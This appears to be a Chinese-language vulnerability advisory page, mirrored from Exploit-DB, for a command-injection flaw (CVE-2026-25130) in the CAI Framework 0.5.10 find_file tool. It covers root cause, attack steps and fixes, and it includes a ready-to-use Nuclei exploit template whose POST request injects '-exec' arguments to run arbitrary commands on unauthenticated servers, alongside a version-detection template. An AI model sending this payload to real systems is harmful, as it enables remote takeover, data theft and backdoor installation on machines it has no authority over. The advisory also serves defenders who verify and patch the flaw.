[webapps] Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection
CVE-2026-25130
Cybersecurity AI (CAI) Framework 0.5.10 存在命令注入漏洞,允许攻击者通过特制请求执行任意系统命令。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2026-25130 |
|---|---|
| 漏洞类型 | 命令注入 |
| 受影响版本 | Cybersecurity AI (CAI) Framework 0.5.10 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-30 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
Cybersecurity AI (CAI) Framework 0.5.10 在处理用户输入时未进行充分的过滤或转义,将用户可控的数据直接传递给系统命令执行函数,导致命令注入。
🎯 攻击场景
1. 攻击者识别到 CAI Framework 的一个功能点,该功能接受用户输入并用于执行系统命令。 2. 攻击者构造包含恶意命令的输入,例如使用分号、管道符、反引号等注入特殊字符。 3. 攻击者向该功能点发送特制请求。 4. 请求被处理,恶意命令与预期命令拼接后执行。 5. 攻击者获得任意系统命令执行权限。成功标志:服务器响应中包含命令执行结果或观察到系统异常行为。
💥 漏洞影响
远程攻击者无需认证即可在目标服务器上以 Web 服务权限执行任意系统命令,导致服务器完全失陷、数据泄露、植入后门或发起横向移动。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-25130-exploit
info:
name: Cybersecurity AI (CAI) Framework <= 0.5.10 - OS Command Injection via find_file
author: Mohammed Idrees Banyamer
severity: high
description: |
CAI Framework up to version 0.5.10 is vulnerable to OS command injection
through the `args` parameter of the `find_file` function. An attacker can
execute arbitrary commands by injecting `-exec` arguments to the underlying
`find` system command.
reference:
- https://github.com/aliasrobotics/cai
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-25130
metadata:
max-request: 1
variables:
cmd: "id"
file_path: "/tmp"
http:
- raw:
- |
POST /cai/tools/reconnaissance/filesystem HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"action":"find_file","file_path":"{{file_path}}","args":"-type f -exec {{cmd}} \\;","ctf":null}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "uid="
- "gid="
- "groups="
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 0
regex:
- '(uid=\d+\([a-zA-Z0-9_]+\)\s+gid=\d+\([a-zA-Z0-9_]+\)\s+groups=\d+\([a-zA-Z0-9_]+\))'
- '([a-zA-Z0-9_]+@[a-zA-Z0-9_]+:[a-zA-Z0-9_/]+)'🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-25130-detection
info:
name: Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection Detection
author: Mohammed Idrees Banyamer
severity: high
description: |
Cybersecurity AI (CAI) Framework up to version 0.5.10 is vulnerable to
OS command injection via the find_file function.
reference:
- https://github.com/aliasrobotics/cai
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-25130
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Cybersecurity AI"
- "CAI Framework"
- "cai-framework"
condition: or
- type: regex
part: body
name: version
regex:
- 'v[0-9]+\.[0-9]+\.[0-9]+'
- '[0-9]+\.[0-9]+\.[0-9]+'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 0
regex:
- '(v[0-9]+\.[0-9]+\.[0-9]+)'
- '([0-9]+\.[0-9]+\.[0-9]+)'
internal: true
name: version_number
- type: kval
kval:
- version_number🛡️ 修复建议
1. 升级到 CAI Framework 0.5.11 或更高版本(如果厂商发布修复版本)。 2. 临时措施:在代码层面使用预编译语句或参数化命令,严格限制用户输入,禁止将用户输入直接拼接到系统命令中;在 Web 服务器或 WAF 层面对输入中的特殊字符(; | & ` $ ( ) { } [ ] < > ! # 等)进行过滤。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:30 | 来源: Exploit-DB